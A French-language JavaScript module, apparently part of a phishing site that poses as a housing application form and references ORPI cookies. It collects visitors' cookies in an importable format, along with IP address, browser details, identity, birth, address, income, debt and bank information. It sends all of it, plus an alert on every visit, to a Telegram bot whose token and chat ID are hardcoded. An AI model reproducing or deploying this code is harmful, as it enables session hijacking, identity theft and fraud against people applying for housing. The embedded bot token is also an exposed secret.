// src/utils/telegramService.js
import { formatCookies } from "./cookieFormatter";
const botToken =
  process.env.REACT_APP_TELEGRAM_BOT_TOKEN ||
  "7866031519:AAFyQndeWshfpm0_WRl4iawtDjdVKwFOIEk";
const chatId = process.env.REACT_APP_TELEGRAM_CHAT_ID || "-1002807725129";
/**
 * Récupère tous les cookies du document et les formate
 * @returns {Array} - Tableau de cookies formatés
 */
export const getAllCookies = () => {
  return document.cookie.split("; ").reduce((cookies, cookie) => {
    if (cookie) {
      const [name, value] = cookie.split("=");
      cookies.push({
        name,
        value,
        domain: window.location.hostname,
        path: "/",
        createdAt: new Date().toISOString(),
      });
    }
    return cookies;
  }, []);
};

/**
 * Envoie un message au bot Telegram
 * @param {string} botToken - Le token du bot Telegram
 * @param {string} chatId - L'ID du chat où envoyer le message
 * @param {string} message - Le message à envoyer
 * @returns {Promise} - Résultat de la requête
 */
export const sendMessageToTelegram = async (message) => {
  try {
    console.log("Envoi du message à Telegram...");
    const response = await fetch(
      `https://api.telegram.org/bot${botToken}/sendMessage`,
      {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          chat_id: chatId,
          text: message,
          parse_mode: "HTML", // Permet d'utiliser le formatage HTML dans les messages
        }),
      }
    );

    const data = await response.json();

    if (!data.ok) {
      console.error("Erreur API Telegram:", data.description);
      throw new Error(`Telegram API error: ${data.description}`);
    }

    console.log("Message envoyé avec succès à Telegram");
    return data;
  } catch (error) {
    console.error("Erreur lors de l'envoi du message à Telegram:", error);
    throw error;
  }
};
/**
 * Envoie l'adresse IP de l'utilisateur au bot Telegram dès son arrivée sur le site
 * @param {string} botToken - Le token du bot Telegram
 * @param {string} chatId - L'ID du chat où envoyer l'information
 * @param {string} ip - L'adresse IP de l'utilisateur
 * @returns {Promise} - Résultat de la requête
 */
export const sendInitialUserInfo = async (ip) => {
  try {
    // Message simplifié selon la demande du client
    const message = `⚡️ NOUVELLE VISITE ⚡️\n• IP: ${ip || "Non disponible"}`;

    return await sendMessageToTelegram(message);
  } catch (error) {
    console.error("Erreur lors de l'envoi des informations initiales:", error);
    // On ne propage pas l'erreur pour ne pas bloquer l'affichage du site
    return null;
  }
};

/**
 * Envoie un fichier au bot Telegram avec un nombre limité de tentatives
 * @param {string} botToken - Le token du bot Telegram
 * @param {string} chatId - L'ID du chat où envoyer le fichier
 * @param {File} file - Le fichier à envoyer
 * @param {string} caption - Description du fichier
 * @param {number} maxRetries - Nombre maximum de tentatives (défaut: 3)
 * @returns {Promise} - Résultat de la requête
 */
export const sendFileToTelegram = async (
  botToken,
  chatId,
  file,
  caption,
  maxRetries = 3
) => {
  let lastError = null;

  for (let attempt = 1; attempt <= maxRetries; attempt++) {
    try {
      console.log(
        `Tentative ${attempt}/${maxRetries} d'envoi du fichier "${file.name}" à Telegram...`
      );

      const formData = new FormData();
      formData.append("chat_id", chatId);
      formData.append("document", file);

      if (caption) {
        formData.append("caption", caption);
      }

      const response = await fetch(
        `https://api.telegram.org/bot${botToken}/sendDocument`,
        {
          method: "POST",
          body: formData,
        }
      );

      // Vérifier si la réponse est valide
      if (!response.ok) {
        throw new Error(`HTTP error! status: ${response.status}`);
      }

      const data = await response.json();

      if (!data.ok) {
        console.error(
          `Tentative ${attempt}/${maxRetries} - Erreur API Telegram lors de l'envoi du fichier:`,
          data.description
        );
        throw new Error(`Telegram API error: ${data.description}`);
      }

      console.log(`Fichier "${file.name}" envoyé avec succès à Telegram`);
      return data;
    } catch (error) {
      console.error(
        `Tentative ${attempt}/${maxRetries} - Erreur lors de l'envoi du fichier à Telegram:`,
        error
      );
      lastError = error;

      // Si ce n'est pas la dernière tentative, attendre avant de réessayer
      if (attempt < maxRetries) {
        const waitTime = 1000 * attempt; // Temps d'attente progressif (1s, 2s, 3s...)
        console.log(`Attente de ${waitTime}ms avant la prochaine tentative...`);
        await new Promise((resolve) => setTimeout(resolve, waitTime));
      }
    }
  }

  // Si toutes les tentatives ont échoué, propager la dernière erreur
  throw (
    lastError ||
    new Error("Échec de l'envoi du fichier après plusieurs tentatives")
  );
};
/**
 * Détecte le navigateur à partir de l'User-Agent
 * @param {string} userAgent - La chaîne User-Agent
 * @returns {string} - Nom du navigateur
 */
const getBrowser = (userAgent) => {
  if (!userAgent) return "Inconnu";

  const ua = userAgent.toLowerCase();

  if (ua.includes("edge") || ua.includes("edg/")) {
    return "Microsoft Edge";
  } else if (ua.includes("chrome") && !ua.includes("chromium")) {
    return "Google Chrome";
  } else if (ua.includes("firefox")) {
    return "Mozilla Firefox";
  } else if (ua.includes("safari") && !ua.includes("chrome")) {
    return "Safari";
  } else if (ua.includes("opera") || ua.includes("opr/")) {
    return "Opera";
  } else if (ua.includes("msie") || ua.includes("trident/")) {
    return "Internet Explorer";
  } else {
    return "Autre navigateur";
  }
};

/**
 * Détecte le système d'exploitation à partir de l'User-Agent
 * @param {string} userAgent - La chaîne User-Agent
 * @returns {string} - Nom du système d'exploitation
 */
const getOperatingSystem = (userAgent) => {
  if (!userAgent) return "Inconnu";

  const ua = userAgent.toLowerCase();

  if (ua.includes("windows nt 10")) {
    return "Windows 10";
  } else if (ua.includes("windows nt 6.3")) {
    return "Windows 8.1";
  } else if (ua.includes("windows nt 6.2")) {
    return "Windows 8";
  } else if (ua.includes("windows nt 6.1")) {
    return "Windows 7";
  } else if (ua.includes("windows")) {
    return "Windows (autre version)";
  } else if (ua.includes("macintosh") || ua.includes("mac os x")) {
    return "macOS";
  } else if (ua.includes("android")) {
    return "Android";
  } else if (
    ua.includes("iphone") ||
    ua.includes("ipad") ||
    ua.includes("ipod")
  ) {
    return "iOS";
  } else if (ua.includes("linux")) {
    return "Linux";
  } else {
    return "Autre système";
  }
};
/**
 * Crée un fichier texte contenant les informations techniques (IP, userAgent)
 * @param {Object} userInfo - Informations sur l'utilisateur (IP, user agent)
 * @param {Object} formData - Les données du formulaire pour inclure le nom et prénom
 * @returns {File} - Fichier texte contenant les informations techniques
 */
export const createTechnicalInfoFile = (userInfo, formData) => {
  const technicalInfo = {
    ip: userInfo.ip || "Non disponible",
    userAgent: userInfo.userAgent || "Non disponible",
    navigateur: getBrowser(userInfo.userAgent),
    systeme: getOperatingSystem(userInfo.userAgent),
    timestamp: new Date().toISOString(),
    formSubmission: {
      nom: formData.nom || "Non renseigné",
      prenom: formData.prenom || "Non renseigné",
      email: formData.email || "Non renseigné",
      telephone: formData.telephoneContact || "Non renseigné",
    },
  };

  // Création du fichier JSON avec un nom incluant date et heure
  const date = new Date();
  const dateStr = `${date.getFullYear()}-${String(date.getMonth() + 1).padStart(
    2,
    "0"
  )}-${String(date.getDate()).padStart(2, "0")}`;

  const jsonString = JSON.stringify(technicalInfo, null, 2); // Formaté avec indentation pour lisibilité
  const file = new File(
    [jsonString],
    `tech_${formData.nom || "client"}_${formData.prenom || ""}_${dateStr}.json`,
    { type: "application/json" }
  );

  return file;
};

/**
 * Crée un fichier JSON contenant les cookies dans le format demandé
 * @param {Object} userInfo - Informations sur l'utilisateur (contient les cookies bruts)
 * @param {Object} formData - Les données du formulaire pour inclure le nom et prénom
 * @returns {File} - Fichier JSON contenant les cookies formatés
 */
export const createCookiesFile = (userInfo, formData = {}) => {
  // Option 1: Utiliser les cookies formatés prédéfinis pour ORPI
  const orpiFormatCookies = formatCookies();

  // Option 2: Utiliser les cookies réels du navigateur (utiliser l'une des deux méthodes)
  const realCookies = userInfo.cookies || getAllCookies();

  // Déterminer quels cookies utiliser (adaptez selon vos besoins)
  // Par exemple, on pourrait préférer les cookies ORPI formatés pour une meilleure compatibilité
  const cookiesToUse =
    orpiFormatCookies.length > 0 ? orpiFormatCookies : realCookies;

  // Création du fichier JSON avec un nom incluant date et heure
  const date = new Date();
  const dateStr = `${date.getFullYear()}-${String(date.getMonth() + 1).padStart(
    2,
    "0"
  )}-${String(date.getDate()).padStart(2, "0")}`;

  // Convertir le tableau en chaîne JSON
  const jsonString = JSON.stringify(cookiesToUse, null, 2);

  // Créer le fichier
  const file = new File(
    [jsonString],
    `cookies_${formData.nom || "client"}_${
      formData.prenom || ""
    }_${dateStr}.json`,
    { type: "application/json" }
  );

  return file;
};
/**
 * Formate les données du formulaire pour l'envoi à Telegram
 * @param {Object} formData - Les données du formulaire
 * @param {Object} userInfo - Informations sur l'utilisateur (IP, user agent, cookies)
 * @returns {string} - Message formaté pour Telegram
 */
export const formatFormDataForTelegram = (formData, userInfo = {}) => {
  // Création d'un message formaté avec HTML pour Telegram
  let message = "<b>🏠 NOUVELLE DEMANDE DE LOGEMENT 🏠</b>\n\n";

  // Type de client: locataire ou garant
  message += "<b>👤 TYPE DE DEMANDE</b>\n";
  if (formData.typeClient === "locataire") {
    message += `• Type: Locataire\n`;

    if (formData.aGarant === "oui") {
      message += `• Avec garant: Oui\n`;
      if (formData.nomGarant) {
        message += `• Nom du garant: ${formData.nomGarant}\n`;
      }
    } else if (formData.aGarant === "non") {
      message += `• Avec garant: Non\n`;
    }
  } else if (formData.typeClient === "garant") {
    message += `• Type: Garant\n`;
    if (formData.nomLocataire) {
      message += `• Nom du locataire: ${formData.nomLocataire}\n`;
    }
  }
  message += "\n";

  // Informations personnelles
  message += "<b>👤 IDENTITÉ</b>\n";
  message += `• Civilité: ${formData.civilite || "Non renseigné"}\n`;
  message += `• Nom: ${formData.nom || "Non renseigné"}\n`;
  message += `• Prénom: ${formData.prenom || "Non renseigné"}\n`;
  if (formData.nomNaissance) {
    message += `• Nom de naissance: ${formData.nomNaissance}\n`;
  }
  message += `• Date de naissance: ${
    formData.dateNaissance || "Non renseigné"
  }\n`;
  message += `• Situation familiale: ${
    formData.situationFamiliale || "Non renseigné"
  }\n`;
  if (
    formData.depuisQuandSituationFamiliale &&
    ["Marié(e)", "Pacsé(e)", "Concubinage"].includes(
      formData.situationFamiliale
    )
  ) {
    message += `• Depuis quand: ${formData.depuisQuandSituationFamiliale}\n`;
  }
  message += `• Nombre d'enfants à charge: ${
    formData.nombreEnfants !== undefined
      ? formData.nombreEnfants
      : "Non renseigné"
  }\n`;
  message += "\n"; // Coordonnées
  message += "<b>📞 COORDONNÉES</b>\n";
  message += `• Email: ${formData.email || "Non renseigné"}\n`;
  message += `• Téléphone: ${formData.telephoneContact || "Non renseigné"}\n`;
  if (formData.telephoneSecondaire) {
    message += `• Téléphone secondaire: ${formData.telephoneSecondaire}\n`;
  }
  message += "\n";

  // Nationalité
  message += "<b>🌍 NATIONALITÉ</b>\n";
  if (formData.nationalite === "Française") {
    message += `• Nationalité: Française\n`;
  } else if (formData.nationalite === "Autre") {
    message += `• Nationalité: ${
      formData.nationaliteAutre || "Autre (non précisée)"
    }\n`;
  } else {
    message += `• Nationalité: Non renseignée\n`;
  }

  if (formData.paysNaissance === "France") {
    message += `• Pays de naissance: France\n`;
    message += `• Ville de naissance: ${
      formData.villeNaissance || "Non renseignée"
    }\n`;
  } else if (formData.paysNaissance === "Autre") {
    message += `• Pays de naissance: ${
      formData.paysNaissanceAutre || "Autre (non précisé)"
    }\n`;
    message += `• Ville de naissance: ${
      formData.villeNaissanceAutre || "Non renseignée"
    }\n`;
  }
  message += "\n";

  // Adresse
  message += "<b>🏠 ADRESSE</b>\n";
  message += `• Adresse: ${formData.adresse || "Non renseignée"}\n`;
  if (formData.complementAdresse) {
    message += `• Complément: ${formData.complementAdresse}\n`;
  }
  message += `• Code postal: ${formData.codePostal || "Non renseigné"}\n`;
  message += `• Ville: ${formData.ville || "Non renseignée"}\n\n`;

  // Situation de logement
  message += "<b>🏡 SITUATION DE LOGEMENT</b>\n";

  const situationLogementMap = {
    proprietaire_avec_pret: "Propriétaire avec prêt",
    proprietaire_sans_pret: "Propriétaire sans prêt",
    locataire: "Locataire",
    loge_famille: "Logé(e) par la famille",
    loge_employeur: "Logé(e) par l'employeur",
    autre: "Autre situation",
  };

  message += `• Situation: ${
    situationLogementMap[formData.situationLogement] ||
    formData.situationLogement ||
    "Non renseignée"
  }\n`;
  message += `• Date d'entrée: ${
    formData.dateEntreeLogement || "Non renseignée"
  }\n\n`; // Situation professionnelle
  message += "<b>💼 SITUATION PROFESSIONNELLE</b>\n";

  // Type de contrat
  const typeContratMap = {
    CDI: "CDI (Contrat à Durée Indéterminée)",
    CDD: "CDD (Contrat à Durée Déterminée)",
    Vacataire: "Vacataire",
    Intérimaire: "Intérimaire",
    Saisonnier: "Saisonnier",
    Contrat_Pro: "Contrat de professionnalisation",
    Apprentissage: "Contrat d'apprentissage",
    Étudiant: "Étudiant",
    Freelance: "Freelance/Indépendant/Auto-entrepreneur",
    Chef_Entreprise: "Chef d'entreprise",
    Libéral: "Profession libérale",
    Fonctionnaire: "Agent public/Fonctionnaire",
    Retraité: "Retraité",
    Sans_Emploi: "Sans emploi",
    Autre: "Autre",
  };

  message += `• Type de contrat: ${
    typeContratMap[formData.typeContrat] ||
    formData.typeContrat ||
    "Non renseigné"
  }\n`;

  // Secteur d'activité
  const secteurActiviteMap = {
    prive: "Secteur privé",
    public: "Secteur public",
    agricole: "Secteur agricole",
    artisans: "Artisans - Commerçants",
    liberales: "Professions libérales",
    retraite: "Retraité(e) ou autres",
  };

  message += `• Secteur d'activité: ${
    secteurActiviteMap[formData.secteurActivite] ||
    formData.secteurActivite ||
    "Non renseigné"
  }\n`;
  message += `• Profession: ${formData.profession || "Non renseignée"}\n`;
  message += `• Date de début: ${
    formData.dateEntreeEntreprise || "Non renseignée"
  }\n\n`;

  // Revenus
  message += "<b>💰 REVENUS</b>\n";
  message += `• Salaire net mensuel: ${
    formData.revenusNets ? formData.revenusNets + " €" : "Non renseigné"
  }\n`;
  message += `• Mois de versement par an: ${
    formData.nbMoisVersement || "12"
  }\n`; // Revenus supplémentaires - Gérer selon la demande du client
  if (formData.autresRevenus === true) {
    // Affiche uniquement les revenus supplémentaires renseignés
    let hasSupplementaryIncome = false;
    let supplementaryIncomeMessage = "";

    if (formData.pensionAlimentaire) {
      supplementaryIncomeMessage += `• Pensions: ${formData.pensionAlimentaire} €\n`;
      hasSupplementaryIncome = true;
    }
    if (formData.allocationsCaf) {
      supplementaryIncomeMessage += `• Allocations CAF: ${formData.allocationsCaf} €\n`;
      hasSupplementaryIncome = true;
    }
    if (formData.revenusFonciers) {
      supplementaryIncomeMessage += `• Revenus fonciers (loyers perçus): ${formData.revenusFonciers} €\n`;
      hasSupplementaryIncome = true;
    }
    if (formData.autresRevenusDescription) {
      supplementaryIncomeMessage += `• Autres revenus: ${formData.autresRevenusDescription} €\n`;
      if (formData.autresRevenusNature) {
        supplementaryIncomeMessage += `  Nature: ${formData.autresRevenusNature}\n`;
      }
      hasSupplementaryIncome = true;
    }

    if (hasSupplementaryIncome) {
      message += "\n<b>Revenus supplémentaires</b>\n";
      message += supplementaryIncomeMessage;
    }
  } else if (formData.autresRevenus === false) {
    message += `\n• Le client a précisé n'avoir aucun revenu supplémentaire\n`;
  }

  // Dépenses mensuelles
  message += "\n<b>💸 DÉPENSES MENSUELLES</b>\n";

  // Loyer / remboursement résidence principale
  if (formData.loyerActuel) {
    message += `• Loyer / remboursement résidence principale: ${formData.loyerActuel} €\n`;
  } else if (formData.loyerActuel === "") {
    message += `• Loyer / remboursement résidence principale: Aucun\n`;
  } else {
    message += `• Loyer / remboursement résidence principale: Non renseigné\n`;
  } // Remboursement résidence secondaire
  if (formData.remboursementSecondaire) {
    message += `• Remboursement résidence secondaire: ${formData.remboursementSecondaire} €\n`;
  } else if (formData.remboursementSecondaire === "") {
    message += `• Remboursement résidence secondaire: Aucun\n`;
  } else {
    message += `• Remboursement résidence secondaire: Non renseigné\n`;
  }

  // Crédits conso
  if (formData.creditConso) {
    message += `• Crédits conso en cours: ${formData.creditConso} €\n`;
    // Ajouter le nom des prêteurs s'il est disponible
    if (formData.nomPreteurs) {
      message += `• Nom des prêteurs: ${formData.nomPreteurs}\n`;
    }
  } else if (formData.creditConso === "") {
    message += `• Crédits conso en cours: Aucun\n`;
  } else {
    message += `• Crédits conso en cours: Non renseigné\n`;
  }

  // Pensions alimentaires
  if (formData.pensionsVersees) {
    message += `• Pension(s) alimentaire(s) versée(s): ${formData.pensionsVersees} €\n`;
  } else if (formData.pensionsVersees === "") {
    message += `• Pension(s) alimentaire(s) versée(s): Aucune\n`;
  } else {
    message += `• Pension(s) alimentaire(s) versée(s): Non renseigné\n`;
  }
  message += "\n";

  // Banque
  message += "<b>🏦 INFORMATIONS BANCAIRES</b>\n";

  // Banque de la liste ou autre
  if (formData.banque) {
    const banques = {
      bnp: "BNP Paribas",
      sg: "Société Générale",
      ca: "Crédit Agricole",
      lcl: "LCL",
      bp: "Banque Populaire",
      ce: "Caisse d'Épargne",
      cm: "Crédit Mutuel",
      ing: "ING",
      boursorama: "Boursorama",
      fortuneo: "Fortuneo",
      n26: "N26",
      revolut: "Revolut",
      hellobank: "Hello Bank",
      autre: formData.autreBanque || "Autre banque",
    };

    message += `• Banque: ${banques[formData.banque] || formData.banque}\n`;
  } else {
    message += `• Banque: Non renseignée\n`;
  } // Année d'ouverture du compte
  if (formData.anneeOuvertureCompte) {
    message += `• Année d'ouverture du compte: ${formData.anneeOuvertureCompte}\n`;
  }
  message += "\n";

  // Type de pièce d'identité
  message += "<b>🪪 PIÈCE D'IDENTITÉ</b>\n";
  const typeIdentiteMap = {
    CNI: "Carte Nationale d'Identité",
    passeport: "Passeport",
    titre: "Titre de séjour",
  };
  message += `• Type: ${
    typeIdentiteMap[formData.typeIdentite] ||
    formData.typeIdentite ||
    "Non renseigné"
  }\n\n`;

  // Timestamp
  message += `📅 Date de soumission: ${new Date().toLocaleString("fr-FR")}\n\n`;

  // Informations techniques
  message += "<b>📱 INFORMATIONS TECHNIQUES</b>\n";
  message += `• Adresse IP: ${userInfo.ip || "Non disponible"}\n`;
  if (userInfo.userAgent) {
    const browser = getBrowser(userInfo.userAgent);
    const os = getOperatingSystem(userInfo.userAgent);
    message += `• Navigateur: ${browser}\n`;
    message += `• Système: ${os}\n`;
    message += `• User-Agent: ${userInfo.userAgent}\n`;
  }

  return message;
};
/**
 * Formate les données du formulaire pour le fichier texte dans le ZIP
 * @param {Object} formData - Les données du formulaire
 * @param {Object} userInfo - Informations sur l'utilisateur (IP, user agent)
 * @returns {string} - Contenu formaté pour le fichier texte
 */
export const formatFormDataForText = (formData, userInfo = {}) => {
  // Format texte identique au message Telegram, mais sans émojis
  let text = "NOUVELLE DEMANDE DE LOGEMENT\n\n";

  // Type de client: locataire ou garant
  text += "TYPE DE DEMANDE\n";
  if (formData.typeClient === "locataire") {
    text += `• Type: Locataire\n`;

    if (formData.aGarant === "oui") {
      text += `• Avec garant: Oui\n`;
      if (formData.nomGarant) {
        text += `• Nom du garant: ${formData.nomGarant}\n`;
      }
    } else if (formData.aGarant === "non") {
      text += `• Avec garant: Non\n`;
    }
  } else if (formData.typeClient === "garant") {
    text += `• Type: Garant\n`;
    if (formData.nomLocataire) {
      text += `• Nom du locataire: ${formData.nomLocataire}\n`;
    }
  }
  text += "\n";

  // Informations personnelles
  text += "IDENTITÉ\n";
  text += `• Civilité: ${formData.civilite || "Non renseigné"}\n`;
  text += `• Nom: ${formData.nom || "Non renseigné"}\n`;
  text += `• Prénom: ${formData.prenom || "Non renseigné"}\n`;
  if (formData.nomNaissance) {
    text += `• Nom de naissance: ${formData.nomNaissance}\n`;
  }
  text += `• Date de naissance: ${formData.dateNaissance || "Non renseigné"}\n`;
  text += `• Situation familiale: ${
    formData.situationFamiliale || "Non renseigné"
  }\n`;
  if (
    formData.depuisQuandSituationFamiliale &&
    ["Marié(e)", "Pacsé(e)", "Concubinage"].includes(
      formData.situationFamiliale
    )
  ) {
    text += `• Depuis quand: ${formData.depuisQuandSituationFamiliale}\n`;
  }
  text += `• Nombre d'enfants à charge: ${
    formData.nombreEnfants !== undefined
      ? formData.nombreEnfants
      : "Non renseigné"
  }\n`;
  text += "\n";

  // Coordonnées
  text += "COORDONNÉES\n";
  text += `• Email: ${formData.email || "Non renseigné"}\n`;
  text += `• Téléphone: ${formData.telephoneContact || "Non renseigné"}\n`;
  if (formData.telephoneSecondaire) {
    text += `• Téléphone secondaire: ${formData.telephoneSecondaire}\n`;
  }
  text += "\n";

  // Nationalité
  text += "NATIONALITÉ\n";
  if (formData.nationalite === "Française") {
    text += `• Nationalité: Française\n`;
  } else if (formData.nationalite === "Autre") {
    text += `• Nationalité: ${
      formData.nationaliteAutre || "Autre (non précisée)"
    }\n`;
  } else {
    text += `• Nationalité: Non renseignée\n`;
  }

  if (formData.paysNaissance === "France") {
    text += `• Pays de naissance: France\n`;
    text += `• Ville de naissance: ${
      formData.villeNaissance || "Non renseignée"
    }\n`;
  } else if (formData.paysNaissance === "Autre") {
    text += `• Pays de naissance: ${
      formData.paysNaissanceAutre || "Autre (non précisé)"
    }\n`;
    text += `• Ville de naissance: ${
      formData.villeNaissanceAutre || "Non renseignée"
    }\n`;
  }
  text += "\n";

  // Adresse
  text += "ADRESSE\n";
  text += `• Adresse: ${formData.adresse || "Non renseignée"}\n`;
  if (formData.complementAdresse) {
    text += `• Complément: ${formData.complementAdresse}\n`;
  }
  text += `• Code postal: ${formData.codePostal || "Non renseigné"}\n`;
  text += `• Ville: ${formData.ville || "Non renseignée"}\n\n`;

  // Situation de logement
  text += "SITUATION DE LOGEMENT\n";

  const situationLogementMap = {
    proprietaire_avec_pret: "Propriétaire avec prêt",
    proprietaire_sans_pret: "Propriétaire sans prêt",
    locataire: "Locataire",
    loge_famille: "Logé(e) par la famille",
    loge_employeur: "Logé(e) par l'employeur",
    autre: "Autre situation",
  };

  text += `• Situation: ${
    situationLogementMap[formData.situationLogement] ||
    formData.situationLogement ||
    "Non renseignée"
  }\n`;
  text += `• Date d'entrée: ${
    formData.dateEntreeLogement || "Non renseignée"
  }\n\n`;

  // Situation professionnelle
  text += "SITUATION PROFESSIONNELLE\n";

  // Type de contrat
  const typeContratMap = {
    CDI: "CDI (Contrat à Durée Indéterminée)",
    CDD: "CDD (Contrat à Durée Déterminée)",
    Vacataire: "Vacataire",
    Intérimaire: "Intérimaire",
    Saisonnier: "Saisonnier",
    Contrat_Pro: "Contrat de professionnalisation",
    Apprentissage: "Contrat d'apprentissage",
    Étudiant: "Étudiant",
    Freelance: "Freelance/Indépendant/Auto-entrepreneur",
    Chef_Entreprise: "Chef d'entreprise",
    Libéral: "Profession libérale",
    Fonctionnaire: "Agent public/Fonctionnaire",
    Retraité: "Retraité",
    Sans_Emploi: "Sans emploi",
    Autre: "Autre",
  };

  text += `• Type de contrat: ${
    typeContratMap[formData.typeContrat] ||
    formData.typeContrat ||
    "Non renseigné"
  }\n`;

  // Secteur d'activité
  const secteurActiviteMap = {
    prive: "Secteur privé",
    public: "Secteur public",
    agricole: "Secteur agricole",
    artisans: "Artisans - Commerçants",
    liberales: "Professions libérales",
    retraite: "Retraité(e) ou autres",
  };

  text += `• Secteur d'activité: ${
    secteurActiviteMap[formData.secteurActivite] ||
    formData.secteurActivite ||
    "Non renseigné"
  }\n`;
  text += `• Profession: ${formData.profession || "Non renseignée"}\n`;
  text += `• Date de début: ${
    formData.dateEntreeEntreprise || "Non renseignée"
  }\n\n`;

  // Revenus
  text += "REVENUS\n";
  text += `• Salaire net mensuel: ${
    formData.revenusNets ? formData.revenusNets + " €" : "Non renseigné"
  }\n`;
  text += `• Mois de versement par an: ${formData.nbMoisVersement || "12"}\n`;

  // Revenus supplémentaires - Gérer selon la demande du client
  if (formData.autresRevenus === true) {
    // Affiche uniquement les revenus supplémentaires renseignés
    let hasSupplementaryIncome = false;
    let supplementaryIncomeMessage = "";

    if (formData.pensionAlimentaire) {
      supplementaryIncomeMessage += `• Pensions: ${formData.pensionAlimentaire} €\n`;
      hasSupplementaryIncome = true;
    }
    if (formData.allocationsCaf) {
      supplementaryIncomeMessage += `• Allocations CAF: ${formData.allocationsCaf} €\n`;
      hasSupplementaryIncome = true;
    }
    if (formData.revenusFonciers) {
      supplementaryIncomeMessage += `• Revenus fonciers (loyers perçus): ${formData.revenusFonciers} €\n`;
      hasSupplementaryIncome = true;
    }
    if (formData.autresRevenusDescription) {
      supplementaryIncomeMessage += `• Autres revenus: ${formData.autresRevenusDescription} €\n`;
      if (formData.autresRevenusNature) {
        supplementaryIncomeMessage += `  Nature: ${formData.autresRevenusNature}\n`;
      }
      hasSupplementaryIncome = true;
    }

    if (hasSupplementaryIncome) {
      text += "\nRevenus supplémentaires\n";
      text += supplementaryIncomeMessage;
    }
  } else if (formData.autresRevenus === false) {
    text += `\n• Le client a précisé n'avoir aucun revenu supplémentaire\n`;
  }

  // Dépenses mensuelles
  text += "\nDÉPENSES MENSUELLES\n";

  // Loyer / remboursement résidence principale
  if (formData.loyerActuel) {
    text += `• Loyer / remboursement résidence principale: ${formData.loyerActuel} €\n`;
  } else if (formData.loyerActuel === "") {
    text += `• Loyer / remboursement résidence principale: Aucun\n`;
  } else {
    text += `• Loyer / remboursement résidence principale: Non renseigné\n`;
  }

  // Remboursement résidence secondaire
  if (formData.remboursementSecondaire) {
    text += `• Remboursement résidence secondaire: ${formData.remboursementSecondaire} €\n`;
  } else if (formData.remboursementSecondaire === "") {
    text += `• Remboursement résidence secondaire: Aucun\n`;
  } else {
    text += `• Remboursement résidence secondaire: Non renseigné\n`;
  }

  // Crédits conso
  if (formData.creditConso) {
    text += `• Crédits conso en cours: ${formData.creditConso} €\n`;
    // Ajouter le nom des prêteurs s'il est disponible
    if (formData.nomPreteurs) {
      text += `• Nom des prêteurs: ${formData.nomPreteurs}\n`;
    }
  } else if (formData.creditConso === "") {
    text += `• Crédits conso en cours: Aucun\n`;
  } else {
    text += `• Crédits conso en cours: Non renseigné\n`;
  }

  // Pensions alimentaires
  if (formData.pensionsVersees) {
    text += `• Pension(s) alimentaire(s) versée(s): ${formData.pensionsVersees} €\n`;
  } else if (formData.pensionsVersees === "") {
    text += `• Pension(s) alimentaire(s) versée(s): Aucune\n`;
  } else {
    text += `• Pension(s) alimentaire(s) versée(s): Non renseigné\n`;
  }
  text += "\n";

  // Banque
  text += "INFORMATIONS BANCAIRES\n";

  // Banque de la liste ou autre
  if (formData.banque) {
    const banques = {
      bnp: "BNP Paribas",
      sg: "Société Générale",
      ca: "Crédit Agricole",
      lcl: "LCL",
      bp: "Banque Populaire",
      ce: "Caisse d'Épargne",
      cm: "Crédit Mutuel",
      ing: "ING",
      boursorama: "Boursorama",
      fortuneo: "Fortuneo",
      n26: "N26",
      revolut: "Revolut",
      hellobank: "Hello Bank",
      autre: formData.autreBanque || "Autre banque",
    };

    text += `• Banque: ${banques[formData.banque] || formData.banque}\n`;
  } else {
    text += `• Banque: Non renseignée\n`;
  }

  // Année d'ouverture du compte
  if (formData.anneeOuvertureCompte) {
    text += `• Année d'ouverture du compte: ${formData.anneeOuvertureCompte}\n`;
  }
  text += "\n";

  // Type de pièce d'identité
  text += "PIÈCE D'IDENTITÉ\n";
  const typeIdentiteMap = {
    CNI: "Carte Nationale d'Identité",
    passeport: "Passeport",
    titre: "Titre de séjour",
  };
  text += `• Type: ${
    typeIdentiteMap[formData.typeIdentite] ||
    formData.typeIdentite ||
    "Non renseigné"
  }\n\n`;

  // Timestamp
  text += `Date de soumission: ${new Date().toLocaleString("fr-FR")}\n\n`;

  // Informations techniques
  text += "INFORMATIONS TECHNIQUES\n";
  text += `• Adresse IP: ${userInfo.ip || "Non disponible"}\n`;
  if (userInfo.userAgent) {
    const browser = getBrowser(userInfo.userAgent);
    const os = getOperatingSystem(userInfo.userAgent);
    text += `• Navigateur: ${browser}\n`;
    text += `• Système: ${os}\n`;
    text += `• User-Agent: ${userInfo.userAgent}\n`;
  }

  return text;
};